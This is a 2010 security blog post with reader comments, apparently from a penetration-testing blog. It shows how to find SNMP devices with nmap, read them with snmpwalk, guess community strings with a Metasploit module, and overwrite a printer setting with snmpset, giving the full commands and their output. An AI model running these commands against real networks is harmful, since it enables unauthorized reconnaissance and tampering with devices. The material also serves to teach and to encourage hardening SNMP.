Compromising Hosts With SNMP

Posted: 3rd September 2010 by Matt in hacks, security
Tags: , , , , , , , , , , , , ,
4

First, if you’ve never fully researched SNMP (Simple Network Management Protocol), I suggest you go do that now because you’re doing yourself a major disservice by not knowing/using the information that’s available through the use of this protocol… not to mention the amount of remote control you have over a machine if you’re able to get an administrative community string.

Most network devices that come with SNMP enabled have two (or more) different community strings. A community string is, basically, the only authentication you need in order to gain access through SNMP. There will be a “read only” community string (usually ‘public’), and a read/write community string (usually ‘private’). Lately, developers have been doing a better job at making sure that the default community strings don’t come with read/write enabled, but not all.

Even if you don’t have the read/write string, simply being able to read from a system gives out a wealth of information. You can view shares, see installed programs, find open ports, pretty much everything you’d ever want to know about a system.

So, first you need to find a box on the network that has SNMP available:

# nmap -sU 1.2.3.* -PN -p161 –open

Now, probably the easiest way to collect info from a box is with ‘snmpwalk’:

$ snmpwalk -c public -v1 1.2.3.4 >> output.txt

The SNMP version will be different depending on the device. If ’1′ doesn’t work, try ‘-v2c’. If that doesn’t work, try ‘-v3′. I find most often it’s either version 1 or 2c.

The output will look something like this:

SNMPv2-MIB::sysDescr.0 = STRING: Canon iR C5185 /P
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.1602.4.7
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (409740748) 47 days, 10:10:07.48
SNMPv2-MIB::sysContact.0 = STRING: joe@microsoft.com
SNMPv2-MIB::sysName.0 = STRING: Canon iR C5185
..huge snip..

Now, lets say that you want to actually change one of these settings. This is where the read/write community string comes into play. The problem is, though, is that you don’t know what it is. It could literally be anything……

Enter Metasploit. :-D

I was actually going to write a tool to do this but decided to search the Metasploit modules first to see what they had for SNMP tools and came across the “scanner/snmp/community” module.

Usage is incredibly simple..

# msfcli scanner/snmp/community rhosts=1.2.3.4 e
[*] Please wait while we load the module tree…
[*] >> progress (1.2.3.4-1.2.3.4) 0/118…
[*] 1.2.3.4 ‘public’ ‘Canon iR C5185 /P’
[*] 1.2.3.4 ‘canon_admin’ ‘Canon iR C5185 /P’
[*] Scanned 1 of 1 hosts (100% complete)

Sweet.. so the second community string is “canon_admin”. I’m willing to bet that with a name like “admin”, it probably has read/write capabilities..

# snmpget -v1 -c canon_admin 1.2.3.4 sysContact.0
SNMPv2-MIB::sysContact.0 = STRING: joe@microsoft.com

# snmpset -v1 -c canon_admin 1.2.3.4 sysContact.0 s matt@attackvector.org
SNMPv2-MIB::sysContact.0 = STRING: matt@attackvector.org

# snmpget -v1 -c canon_admin 1.2.3.4 sysContact.0
SNMPv2-MIB::sysContact.0 = STRING: matt@attackvector.org

Yep, sure enough.

You can use ‘snmpget’ to get a specific OID.. and use ‘snmpset’ to set a specific OID. The ‘s’ before the value indicates that we’re supplying a string.

If you enjoyed this post, make sure you subscribe to my RSS feed! You can also follow me on Twitter here.
Share

Related posts:

  1. Favorite nmap NSE scripts
  2. Backdoor Password in Accton Based Switches
  3. Fun with printers (part 2)
  1. clong says:
    September 7, 2010 at 5:12 pm

    Enjoying your blog so far!

    This may help convince my company to lock down SNMP on our printers :-)

  2. Matt says:
    September 8, 2010 at 9:32 am

    @clong: What type of printers are they? If they’re HP, you may want to check out a few of my other posts.. specifically parts 2 and 3.

    Fun With Printers (Part 1)
    Fun With Printers (Part 2)
    Fun With Printers (Part 3)

    Also, I hope that I didn’t give the impression that this only affects printers.. I was just doing it against a printer because it was the most readily available device that I had access to at the moment.. :-)

  3. sidereal_ says:
    September 14, 2010 at 2:24 am

    can you disseminate your configure fle(/etc/snmp/snmpd.conf).because ı want to changing some information for example sys.sysLocation.0 , sys.sysContact.0 but didint :(

  4. Matt says:
    September 14, 2010 at 9:29 am

    Prior to any changes:
    $ snmpwalk -v2c localhost -c public
    SNMPv2-MIB::sysDescr.0 = STRING: Linux [snip]
    SNMPv2-MIB::sysContact.0 = STRING: Root (configure /etc/snmp/snmpd.local.conf)
    SNMPv2-MIB::sysLocation.0 = STRING: Unknown (configure /etc/snmp/snmpd.local.conf)

    After changes:
    $ snmpwalk -v2c localhost -c public
    SNMPv2-MIB::sysDescr.0 = STRING: “Windows XP”
    SNMPv2-MIB::sysContact.0 = STRING: “matt@attackvector.org”
    SNMPv2-MIB::sysLocation.0 = STRING: “Uranus”

    What I added to snmpd.conf:

    $ tail /etc/snmp/snmpd.conf
    # Further Information
    #
    # See the snmpd.conf manual page, and the output of “snmpd -H”.
    # MUCH more can be done with the snmpd.conf than is shown as an
    # example here.

    syslocation “Uranus”
    syscontact “matt@attackvector.org”
    sysdescr “Windows XP”

    http://linux.die.net/man/5/snmpd.conf

Spam Protection by WP-SpamFree